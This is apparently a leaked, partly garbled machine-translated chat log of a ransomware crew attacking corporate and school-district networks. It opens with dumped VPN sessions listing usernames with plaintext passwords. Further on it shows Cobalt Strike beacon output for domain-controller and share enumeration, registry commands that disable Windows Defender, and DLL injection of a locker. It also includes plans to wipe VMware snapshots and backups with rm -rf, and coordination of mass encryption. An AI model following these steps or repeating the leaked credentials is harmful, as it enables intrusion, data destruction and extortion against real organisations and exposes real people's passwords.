jszrMOtthNXAO10JW5RIO7MW18D5isBJlOb02qBGEBQ= userType: 1 userName: dlindblad Password: Hicksville83 Domain: L&M Domain [+] Found: SessionID: lJjQi2ri9viQWQ1XEmCvrAfnmmV3Ev2CS0wwq92riAs= userType: 1 userName: tbishop Password: P0L!1nS3c0Nn0 Domain: L&M Domain [+] Found: SessionID: lufvh9TXJezldkQQ2KF5mimA3mnwS9qneyWGr4TFPOU= userType: 1 userName: cjackson Password: h44RsF2PP* Domain: L&M Domain [+] Found: SessionID: sDrdLmvwALSF3jTMnSUkHYwq9ZfWqPcbd0PlX0bBJ5o= userType: 1 userName: acox Password: December2020 Domain: L&M Domain [+] Found: SessionID: smA9plEUTxuk1LKzY0qOLCsOC7n7SJlG7pVwnj9aj9o= userType: 1 userName: cfarrell Password: Covid2019! 
Domain: L&M Domain [+] Found: SessionID: tel1xLliHnrxuJ4jG9eA1RfLrHgIi5RFNFdmA9qM9rA8= userType: 1 userName: lstrzegowski Password: Whiskers45$ Domain: L&M Domain [+] Found: SessionID: tn9IFU4flYiaulqazAeVJA5vWp5thOOj2ZzTvq08C9U= userType: 1 userName: aluckey Password: SelenaBrody&Champ35 Domain: L&M Domain [+] Found: SessionID: vhyW0wcf8tOIlogYk7tb4qpKNYGlZGPeAU1EiL1b8XY= userType: 1 userName: nthompson Password: Trinity2011 Domain: L&M Domain [+] Found: SessionID: wOfMo3AmB7a0a0a0tk8Js1kpwwINyCCTOHKWHIkhutrag= userType: 1 userName: sriggs Password: Sammers0309# Domain: L&M Domain [+] Found: SessionID: x1Fb1A3YjVnXF40T10eItH4OdjRdsxZG7MrCtqDLpxA= userType: 1 userName: tfewster Password: BabyItsColdOutside1 Domain: L&M Domain [+] Done with https://107.0.14.250, found 33 sessions 33 [+] Saving session data [+] Trying session 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFfQpSM= [+] Saving config to ./Dumps/107.0.14.250/config.sqlite [==================================================] [+] Config dumped [+] Parsing configuration data [+] Finding users [+] Found 143 users [+] Finding AD credentials [!!!] Found Active Directory creds [+] AD creds sslvpn:4311_Secure@10.1.1.45 [+] Looking for LDAP domain credentials [-] No LDAP credentials found. [+] Looking for RADIUS domain creds [-] No usable RADIUS domain data [+] Parsing bookmarks [+] Found bookmarks, Hunting for creds [**] Found bookmark with creds [+] Found bookmark {'name': '1', 'username': 'sslvpn', 'password': '4311_Secure', 'service': 'RDP', 'host': '10.1.1.45'} com/group/1-done-expederal-com?msg=G2z6E3Dm4XPiahEer) no)) backups were on the wine servers1.done.expFederal.com there were not vim? 
so we can not do anything with them linux software we have no@user4 fuck you revealed all the cards)) USCHI-DT005.Hobbes.loc [10.20.20.37] sh-0004.hobbes.loc [10.20.4.4] DT-000016.Hobbes.loc [10.20.20.53] LT-000047.Hobbes.loc [10.20.99.175] LT-000060.Hobbes.loc [10.20.20.30] USCHI-TB001.Hobbes.loc [10.20.99.173] LT-000073.Hobbes.loc [10.20.99.172] uschi-psc001.hobbes.loc [10.20.4.56] TB-000025.Hobbes.loc [10.20.99.151] USCHI-HR-LT201.Hobbes.loc [10.20.99.153] TB-000028.Hobbes.loc [10.20.20.22] TB-000034.Hobbes.loc [10.20.99.160] DT-000037.Hobbes.loc [10.20.20.71]+ USCHI-AI-LT321.Hobbes.loc [10.20.99.178] LT-000116.Hobbes.loc [10.20.99.172] USCHI-PM-DT607.Hobbes.loc [10.20.32.201] USCHI-EM-LT403.Hobbes.loc [10.20.20.23] USCHA-EX-LT003.Hobbes.loc [10.6.0.105] ``` These are linux armas (at least there is no ipc$ or admin$ or c$ yb d$ etc) ```. Host Name: USCHI-SBS002 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00377-70390-48722-AA601 Original Install Date: 5/15/2019, 3:10:42 PM System Boot Time: 12/9/2020, 5:51:51 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz BIOS Version: VMware, Inc. 
VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-06:00) Central Time (US & Canada) Total Physical Memory: 16,383 MB Available Physical Memory: 15.093 MB Virtual Memory: Max Size: 18,815 MB Virtual Memory: Available: 17,620 MB Virtual Memory: In Use: 1,195 MB Page File Location(s): C:\pagefile.sys Domain: Hobbes.loc Logon Server: N/A Hotfix(s): 13 Hotfix(s) Installed. [01]: KB3186568 [02]: KB4049065 [03]: KB4494175 [04]: KB4498947 [05]: KB4503537 [06]: KB4520724 [07]: KB4524244 [08]: KB4540723 [09]: KB4550994 [10]: KB4562561 [11]: KB4565912 [12]: KB4576750 [13]: KB4593226 Network Card(s): 2 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Internal DHCP Enabled: No IP address(es). [01]: 10.20.32.20 [02]: Intel(R) 82574L Gigabit Network Connection Connection Name: External DHCP Enabled: No IP address(es) [01]: 10.111.1.64 [02]: 10.111.1.63 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. ``` I found this shit, here's some hosts spinning under 1 ipi153 was alive on the input) and 57 armas of 10053 servers of which 46153 hosts[ ](https://mediaeveryone.com/group/expfederal-com?msg=kfJRgvJSmNwimgd78) armas sure enough? 
I can not say more than that of the ones I work with, they are my favorite top down u v w x y z``` Disconnected U: \10.111.1.32\C$ Microsoft Windows Network Disconnected V: \10.20.32.200$ Microsoft Windows Network Disconnected W: \10.20.32.103$ Microsoft Windows Network OK X: \10.20.32.101$ Microsoft Windows Network OK Y: \10.20.32.202\C$ Microsoft Windows Network OK Z: \10.20.32.21\C$ Microsoft Windows Network I had a few servers that neither vmik, nor jump, nor remot eksekzekom did not attract30 unique ip armies) 10.20.20.46 10.20.20.37 10.20.20.50 10.20.32.90 10.20.4.4 10.20.20.53 10.20.99.150 10.20.99.163 10.20.99.158 10.20.99.175 10.20.20.31 10.20.20.30 10.20.99.152 10.20.99.173 10.20.99.172 10.20.99.159 10.6.0.105 10.20.4.56 10.20.20.56 10.20.99.151 10.20.99.154 10.20.99.153 10.20.20.22 10.20.99.156 10.20.99.160 10.20.20.71 10.20.99.178 10.20.99.180 10.20.32.201 10.20.20.23 ``52 unique ip'' 10.20.32.100 10.111.2.20 10.20.32.28 10.111.1.31 10.111.1.15 10.111.2.15 10.20.32.203 10.111.1.32 10.20.32.200 10.20.32.93 10.20.32.34 10.20.32.40 10.20.32.31 10.111.1.33 10.20.32.13 10.20.32.14 10.20.32.6 10.20.32.4 10.20.32.20 10.20.32.30 10.20.32.18 10.20.32.72 10.20.32.175 10.20.32.24 10.6.0.5 10.6.0.56 10.6.0.58 10.20.32.71 10.20.32.70 10.20.32.188 10.6.0.30 10.20.32.33 10.20.32.50 10.111.1.50 10.20.32.5 10.20.32.7 10.20.32.60 10.20.32.75 10.20.32.76 10.111.1.10 10.20.32.15 10.20.32.202 10.6.0.60 10.20.32.21 10.20.32.101 10.20.32.102 10.20.32.103 10.20.32.45 10.20.32.73 10.20.32.74 10.20.32.46 10.20.32.110 i had a report on the pings of the servers? 46 ip53 hostname or did you count 53 and 46 by ip? because hostnames refer to the same ip53 = 46? 46 servers shut down100 armas and nix53 serversa total of 153 live hostnames were with armas as soon as the servers 53 ``` LT-000082.Hobbes.loc [10.20.99.175] LT-000047.Hobbes.loc [10.20.99.175] ``[ ](https://mediaeveryone.com/group/expfederal-com?msg=z4FdusPQAXacvdFZj) total livehosts 53? 
so they have a few hostnames per ip
53
a fuck the number of livehosts in general
aahaa
those 7 servers that are not closed, what about them?
53 servers alive, 89 were in adcom
how many live were otklabbed servers, somehow not enough
236 in adcom, there a bunch of old not thick however...
236 comps total
53 pinged servers, closed 46
57 pinged armies, closed 39
and with armies so je
servers/closed servers shut down
status
everywhere there are notes for stats guys
18 armies minus
da)),kznm
```
Teemo beacon> net dclist
[*] Tasked beacon to run net dclist
[+] host called home, sent: 104506 bytes
[+] received output:
DCs:

[+] received output:

 Server Name  IP Address  Platform  Version  Type  Comment
 -----------  ----------  --------  -------  ----  -------
[-] Error: 6118
```
```
beacon> shell nltest /dclist:Hobbes
[*] Tasked beacon to run: nltest /dclist:Hobbes
[+] host called home, sent: 52 bytes
[+] received output:
Get list of DCs in domain 'Hobbes' from '\\USCHA-DCG002'.
          PCHIDCG003.Hobbes.loc [DS] Site: Chicago
          PCHIDCG004.Hobbes.loc [DS] Site: Chicago
        USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
        USCHA-DCG002.Hobbes.loc [DS] Site: WDC
        USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
        USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
          PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
             sh-0004.hobbes.loc [RODC]
The command completed successfully
```
```
Teemo beacon> shell nltest /dclist:Hobbes.loc
[*] Tasked beacon to run: nltest /dclist:Hobbes.loc
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'Hobbes.loc' from '\\USCHA-DCG002.Hobbes.loc'.
          PCHIDCG003.Hobbes.loc [DS] Site: Chicago
          PCHIDCG004.Hobbes.loc [DS] Site: Chicago
        USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
        USCHA-DCG002.Hobbes.loc [DS] Site: WDC
        USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
        USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
          PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
             sh-0004.hobbes.loc [RODC]
The command completed successfully
```
Fucking figured it out...
You need to do an inject in the winlagon, then the flight is normal. and one is not pinged so there is already a note everywhere this does not always work immediately check the other way `` Teemo beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: [+] received output: [-] Error: 0 I have a lot of trouble with this, I can't get it to work, I'm not sure if it's working, but it's not working. wait for confirmation from voodootry it through eheav and def off? did not help gjvjukj that will be the current state you are here should remain uninstall they are replicated look, we have two snapshots, if we delete them, then we will also rub the machine?or the classic way to mask the disks somewhere try to offload av, vindefTry different archa in general clean the root home folder root[ ](https://mediaeveryone.com/group/expfederal-com?msg=6dKMvPj8Za59kfYWw) the command below what is it? hang 20 minsli avers or something there is nothing - check if the bitness of the injected dll coincides with the bitness of the system [root@uschi-vhp001:~] cat /etc/passwd root:x:0:0:Administrator:/:/bin/sh daemon:x:2:2:System daemons:/:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/:/sbin/nologin dcui:x:100:100:DCUI User:/:/sbin/nologin vpxuser:x:500:100:VMware VirtualCenter administration account:/:/bin/sh rootmgmt:x:1000:1000:ESXi User:/:/bin/sh vxpsvc_ptagent_op:x:1001:1001:ESXi User:/:/bin/sh ``If it gets up, it means that the injection process itself is being tapped by an aver or something[ ](https://mediaeveryone.com/group/expfederal-com?msg=ppyLCj2p7LQ9XuXpp) strange but there seems to be nothing to clean it hangs? 
or "gets up" ?on some armasPrimary injection kryptor session hangs you hope to clean the history of commands in linigui bluntly still such a thing through the gui better`rm -rf vmfs/volumes` look in the properties / settings no))) you there lin not format) and how to delete the previous snapshots, so as not to lose the current one?i don't want to lose the current snapshots) leave the current snapshots and then start the process from there and delete the snapshots in the wok, go to the web as it was before and delete the snapshots from the spheres in the wok and leave the current state from the center in the web interface where do you delete in general) rm -rf is that ok?more in the processesnaps deleted from the center and with veem resolved? in the rest everywhere there is a note they need to reattach and armies * if everything is ok, close dk check all servers for a note krasavchiki + armies, also all? dk fuck all? servers are almost all, just re-sleep a few pieces)) but they work, probably session with proxy hangs, we thought the nicks servers sphere rejecteddah hz) and what shutdown you were talking about at all?)on the nixes lie snapshots are deleted we pulled these virtual servers, their polochimnu disconnected like what? *snapshots started deleting bekapov virtual disks where these servers lie? get them to lock or they are on the nix somewhere? armas pull pull or pull armas already pulled betterwhen all pull now will demolishDid you delete the seksnapshots? no, the pings passed[ ](https://mediaeveryone.com/group/expfederal-com?msg=2mcqWpWjKLkka3NdD) maybe they have a notifier to enter the csi or something...are you talking about the sphere? they probably shut it down did they get something wrong? they removed the servers with virtual machines from the network. what do we do? 10.111.2.20 one more dk not pull 10.20.32.101 10.20.32.21 10.20.32.202 10.111.1.10 ``` servers, no dns and dk for later ```. Get list of DCs in domain 'HOBBES' from '\\USCHI-DCP001'. 
PCHIDCG003.Hobbes.loc [DS] Site: Chicago PCHIDCG004.Hobbes.loc [DS] Site: Chicago USCHI-DCP001.Hobbes.loc [DS] Site: Chicago USCHA-DCG002.Hobbes.loc [DS] Site: WDC USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ sh-0004.hobbes.loc [RODC] ``Take everything into the coba, or how then mapi armas on the server) suddenly, and we have already rubbed) no yet, the build waited have you done it? ``Are we done with the centersof the sphere? Do we have to disable vindef and sofos? the new build seems to be working, right? now on the fast, we'll pull the servers into the cobu user 7@tl1 will now give the build the contents of the cryptimnu image yes just snapshots tear down wait for build)well @tl2backup server also found in hellcompact they had two nix servers in hell under the allsphere, now one is not available, the other whether not working, or not configured and these two that were found, not visible in ad comp - there are stored snapshots sofos admin foundnu we just overwrite them, right? under the root came here. is there a build under the lin? @echo off for /f %%i in (hosts.txt) do ( tasklist /s %%i /v >> .\ps.txt ) ``webrootanywhere``wsndomain.com - do not touch ``itc-us.com`` - work with her by kerbals by the way? 
if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where today you will take YES you can finish it carefully can not promise anythingKILL THE NET INSTRUCTOR UP, HE CAN DO IT!before you go to groups, write down what's at what stage and don't kill the networkDisassemble the tool:fingers_crossed:where there are deadlocks today,//www.trendmicro.com/en_us/what-is/zerologon.html by 12 today, not working on weekendsmonitor the input cob for new sessionswrite in groups that are active now and statuscom in the workIf there are new throw there, work what about the sessions? I have them off4 and 7priloveWhere are the rest of you? everyone Hello so already added? `itc-us-com `conf name where to add itc-us-com What is it? ITC.LOCAL turns out so#itc-us-com ?ITCMA and no yes there is a system with user7 help user1 now i'll add you to the team of free users write in groups where there is no system yes tomorrow will be clear or without allThis weekend without me.and since you did not sleep, tomorrow i will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today?tomorrow will be clear for sure it's still conditional info!!!!!!!!!!!!!!!!!!!!!!!! will be a day off on saturday, as well as on sunday before 7 will raise the system to yes? tomorrow = today tomorrow by 3 today until 7write the statuses in the active groups how are you doing?Hi! - Goodbye, all have a day off on friday :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: At 6 pm on friday9that is today?or sleep = tomorrow1.done.sisd.pettomorrow on thursday friday don't have a day off tomorrow by 6 pm 610 mina although stop probably I won't keep you up long :thumbsup:sleep till 10 so you said today we'll sleep the sessions do not kill good work well well donetoday at 10 pmtomorrow is thursday?no)morning? 
tomorrow by 10 then all of 277 23 or not pinged or couldn't pull then servers on two domains on the second domain servers?report on the 2 domainsomotely97 servers that could not jump all the disks pulled up and in the second what do we have? in our coba 153 servers.all? raise sagging 2 and remains dk finished? 13 what's left? in 20 min I think you can manage56 in 11 for each how much? not a lot of servers left? no so what's done? not all, do not break 7772 is NAS3 only on the free? tomorrow we sleep sleep on it continue dazd. i started the build, check the udm and then mappy went all server map closed? no sure, maybe 1000 somewhere or something smaller i thought you all are not finished? so servers with unmapped armaments close? skype a report on how many closed armaments and servers and basically kill them in a small domain beacon> shell systeminfo [*] Tasked beacon to run: systeminfo [+] host called home, sent: 41 bytes [+] received output: Host Name: AHS-VIDEO OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 8/4/2016, 10:49:05 AM System Boot Time: 11/30/2020, 7:44:12 AM System Manufacturer: Dell Inc. System Model: PowerEdge R230 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3504 Mhz BIOS Version: Dell Inc. 
``Well, what's cool besides dns and dkpolly? Did you close the second domain? Give me more sisteminfo of this session and everything ok try the exe`` `` C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f The operation completed successfully. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f The operation completed successfully. C:\ProgramData>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f Access is denied. 
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f Access is denied. C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f Access is denied. C:\ProgramData>reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f Access is denied. C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f The operation completed successfully. ``Second domain kst closed? drop windef@user8 and try through ehenhene broke DNS, DCserver632dllinject - architecture - gonet, session what? How should I know and what is this? yes:all servers were closed? [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 217711 bytes [-] relocation truncated to fit (distance between executable code and other data is >4GB) ``Yeah, and then the eyes in a bunch alreadyCHae when will dc break? work prettak so what do you have there? The main thing that the session did not fall offkv in the process just about this yanu like the udmi is, and the format does not all change the filesa udmi?well there not all files appear .HWOEU or something like that? only readme.txtfile kst appearedsession should be aliveopen it pliz2860dai pid bicona and tdnase close the server with the hrvNo c.lf `` [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 217711 bytes [+] received output: Injected. [+] host called home, sent: 19 bytes [+] host called home, sent: 20 bytes ``Launch a zamapilid server in parallel do we drop mapping and start encrypting? 
here.lflisting C:how do we know what works? in the session where mapping under any kredavs? blank dllinject field in the argument what to put in? Geordi.sisd.k12 [PDC] [DS] Site: DoTs Picard.sisd.k12 [DS] Site: DoTs Lor.sisd.k12 [DS] Site: Ed-Center `````` ADMINDC5 10.0.61.13 ADMINDC1 10.0.61.2 ADMINDC3 10.0.61.6 ADMINDC4 10.0.61.7 ADMINDC2 10.0.61.10 SPOCK 10.7.51.3 AZUREDC1 10.221.32.4 ``To the very last, do NOT TAKE THEM AND DON'T TROUBLE the right bitness dll startup through dllinjest on servers where it's mapped in full`` the fuck left? by two, but ours is the least of itServers are starting to hang you by 3 kobas divided? We are starting to hang what mapi - mapiem then continue the list`` beacon> shell net view \10.16.239.134\ [*] Tasked beacon to run: net view \\10.16.239.134\ [+] host called home, sent: 56 bytes [+] received output: There are no entries in the list. Then there's no resonance? Did you use the IP to map? I got 50 out of 200 armies - 30% - The network path was not found. 70% - The network path was not found.I leave those servers and go map armies? beacon> shell net use * \\10.0.53.26\dump [*] Tasked beacon to run: net use * \\\10.0.53.26\dump [+] host called home, sent: 58 bytes [+] received output: System error 53 has occurred. The network path was not found. beacon> shell net use * \\10.0.53.26\engrade [*] Tasked beacon to run: net use *\\\10.0.53.26\engrade [+] host called home, sent: 61 bytes [+] received output: System error 53 has occurred. The network path was not found. ``Map everything or one of them? Not yet``` beacon> shell net view \10.0.53.26\ [*] Tasked beacon to run: net view \10.0.53.26\ [+] host called home, sent: 53 bytes [+] received output: Shared resources at \10.0.53.26\. 
Share name Type Used as Comment ------------------------------------------------------------------------------- dump Disk engrade Disk Import_Services Disk SMDIM Disk VT_Integration Disk The command completed successfully. ``` Did you copy these? beacon> shell net view \10.0.53.26\ [*] Tasked beacon to run: net view \10.0.53.26\ [+] host called home, sent: 53 bytes [+] received output: Shared resources at \10.0.53.26\. Share name Type Used as Comment ------------------------------------------------------------------------------- dump Disk engrade Disk Import_Services Disk SMDIM Disk VT_Integration Disk The command completed successfully. beacon> shell net view \10.0.50.1\ [*] Tasked beacon to run: net view \10.0.50.1\ [+] host called home, sent: 52 bytes [+] received output: There are no entries in the list. beacon> shell net view \10.0.53.25\ [*] Tasked beacon to run: net view \10.0.53.25\ [+] host called home, sent: 53 bytes [+] received output: There are no entries in the list. ``the same story`` beacon> shell net view \10.51.200.121\ [*] Tasked beacon to run: net view \10.51.200.121\ [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. ``Check with another server, are those from ``?? 
`````` beacon> shell net view \10.0.61.61\ [*] Tasked beacon to run: net view \10.0.61.61\ [+] host called home, sent: 53 bytes [+] received output: Shared resources at \10.0.61.61\ Share name Type Used as Comment ------------------------------------------------------------------------------- Scann Disk The command completed successfully. beacon> shell net view \10.0.61.57\ [*] Tasked beacon to run: net view \10.0.61.57\ [+] host called home, sent: 53 bytes [+] received output: There are no entries in the list. beacon> shell net view \10.0.53.230\ [*] Tasked beacon to run: net view \10.0.53.230\ [+] host called home, sent: 54 bytes [+] received output: There are no entries in the list. beacon> shell net view \10.116.200.121\ [*] Tasked beacon to run: net view \10.116.200.121\ [+] host called home, sent: 57 bytes [+] received output: System error 53 has occurred. The network path was not found. beacon> shell net view \10.58.200.121\ [*] Tasked beacon to run: net view \10.58.200.121\ [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. beacon> shell net view \10.0.53.25\ [*] Tasked beacon to run: net view \10.0.53.25\ [+] host called home, sent: 53 bytes [+] received output: There are no entries in the list. beacon> shell net view \10.0.50.1\ [*] Tasked beacon to run: net view \10.0.50.1\ [+] host called home, sent: 52 bytes [+] received output: There are no entries in the list. beacon> shell net view \10.0.53.26\ [*] Tasked beacon to run: net view \10.0.53.26\ [+] host called home, sent: 53 bytes [+] received output: Shared resources at \10.0.53.26\. Share name Type Used as Comment ------------------------------------------------------------------------------- dump Disk engrade Disk Import_Services Disk SMDIM Disk VT_Integration Disk The command completed successfully. 
beacon> shell net view \10.51.200.121\ [*] Tasked beacon to run: net view \10.51.200.121\ [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. ``They're only available. beacon> shell net view \10.0.61.61\ [*] Tasked beacon to run: net view \10.0.61.61\ [+] host called home, sent: 53 bytes [+] received output: Shared resources at \10.0.61.61\ Share name Type Used as Comment ------------------------------------------------------------------------------- Scann Disk The command completed successfully. Look without /all + did you look through net view /all? beacon> shell dir \\10.0.61.61\E$ [*] Tasked beacon to run: dir \\10.0.61.61\E$ [+] host called home, sent: 50 bytes [+] received output: The network name cannot be found. `` can you see the dir? no, we only pull what's pulling C? no except for the other mappings? Status Local Remote Network ------------------------------------------------------------------------------- OK Q: \10.210.0.51\C$ Microsoft Windows Network OK R: \10.210.0.42\C$ Microsoft Windows Network OK S: \10.210.0.42C$ Microsoft Windows Network OK T: \10.210.0.62$ Microsoft Windows Network OK U: \10.210.0.41.41\C$ Microsoft Windows Network OK V: \10.210.0.61\C$ Microsoft Windows Network OK W: \10.0.51.84$ Microsoft Windows Network OK X: \10.0.53.24\C$ Microsoft Windows Network OK Y: \10.210.0.52$ Microsoft Windows Network OK Z: \10.0.61.69\N$ Microsoft Windows Network The drive is a letter, i.e. net use A: \host\c$$$ do you mapped to letters? this one has disks - yes `` beacon> shell net use *\\\10.0.61.61\C$ [*] Tasked beacon to run: net use *\\\10.0.61.61\C$ [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. 
``` ``` Shared resources at \\10.0.61.61\ Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share E$ Disk Default share G$ Disk Default share I$ Disk Default share IPC$ IPC Remote IPC M$ Disk Default share P$ Disk Default share Q$ Disk Default share R$ Disk Default share Scann Disk T$ Disk Default share The command completed successfully. ``ad_computers.txt:7592: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12 ad_computers.txt:7641: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12 ad_computers.txt:7690: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12 ad_computers.txt:826378: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12 ad_computers.txt:1560647: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12 I see that these are attracted? and which are not attracted it seems to be part of the cluster - there is simply replicated data, check.... and this is attracted? 
HyperV-Dell01.admin.sisd.k12 ``consistently.'' [*] Listing: \\10.0.61.69\N$\shared\ Size Type Last Modified Name ---- ---- ------------- ---- dir 03/09/2015 09:03:16 $RECYCLE.BIN dir 11/17/2017 08:39:57 amh dir 01/16/2020 14:13:59 BPA dir 01/16/2019 16:49:23:23 BPA Teacher dir 11/14/2019 13:03:31 CTE dir 03/09/2015 09:05:42:42 ech dir 10/15/2019 12:54:42 ED9 dir 04/03/2017 14:12:52:52 edh dir 09/09/2015 09:02:26 ELH dir 03/09/2015 09:12:02:02 files dir 11/19/2019 09:28:51 GoVenture dir 03/28/2016 14:48:04 key dir 03/09/2015 09:15:51 moh dir 03/09/2015 09:16:05 most2003 dir 03/09/2015 09:16:31 oph dir 03/09/2015 09:16:35 PM PharmExam dir 09/09/2015 09:24:12 PM Profile dir 04/06/2017 10:44:18 PM software dir 09/09/2016 09:28:04 soh dir 03/09/2015 10:55:17 PM System Volume Information dir 03/09/2015 10:55:17 vBusiness ``and shared [*] Listing: \\10.0.61.69\N$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 05/05/2020 14:45:23 $RECYCLE.BIN dir 12/10/2018 09:34:11 Backup Agents for Cluster Groups dir 02/19/2019 08:08:46 Program Files dir 01/16/2019 16:34:55 shared dir 12/07/2020 19:04:06:06 System Volume Information `` give me a listing of this directory N$$ do not see disks they are not attracted, no ball ``` Av-CNS-HyperV: 10.0.53.210 Av-HyperV-Dell1: 10.0.53.250 Av-HyperV-FX2-1: 10.0.53.193 Av-T-HyperV: 10.0.53.238 ``I poked at the randome what if yes - all the folders inside the N$ are contained all the folders that are ``next to it``? beacon> portscan 10.0.61.69 445,135,139 [*] Tasked beacon to scan ports 445,135,139 on 10.0.61.69 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.0.61.69' is alive. 
[read 8 bytes] 10.0.61.69:139 10.0.61.69:135 10.0.61.69:445 (platform: 500 version: 10.0 name: NAS2 domain: ADM) ``no need for that there are almost no handhelds on workstations, cobalt can't handle 1k sessions already wrote it down so what? @user8 please give me access to the cobalt private where you have a session with the YES token beacon> shell net view \10.0.61.69 /all [*] Tasked beacon to run: net view \\10.0.61.69 /all [+] host called home, sent: 57 bytes [+] received output: Shared resources at \10.0.61.69 Share name Type Used as Comment ------------------------------------------------------------------------------- amh Disk BPA Disk CTE Disk ech Disk ED9 Disk EDH Disk ELH Disk files Disk GoVenture Disk IPC$ IPC Remote IPC KEY Disk MOH Disk most2003 Disk N$ Disk Z: Cluster Default Share OPH Disk PharmExam Disk Profile Disk shared Disk software Disk SOH Disk vbusiness Disk The command completed successfully. Shell net view \10.0.61.69 /all right, that's what I mean)) like a variant without a drop to disk beacon> shell wmic /node:10.0.61.69 os get name [*] Tasked beacon to run: wmic /node:10.0.61.69 os get name [+] host called home, sent: 64 bytes [+] received output: Name Microsoft Windows Server 2016 Standard|C:\Windows|\Device\Harddisk0\Partition2 ``To bypass the avne spread and inject the dll locker into the current biconay process, as I understood that the new script will spread the build across all the sessions open in the coba. So maybe it's better to pull the armas into the coba and not mount them? or the nix server? and you're sure it's the windup at all? Shares for 10.0.61.69: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] amh BPA CTE ech ED9 EDH ELH files GoVenture KEY MOH most2003 N$ OPH PharmExam Profile shared software SOH vbusiness ******* COMPLETE ******* ``or wmica net view? 
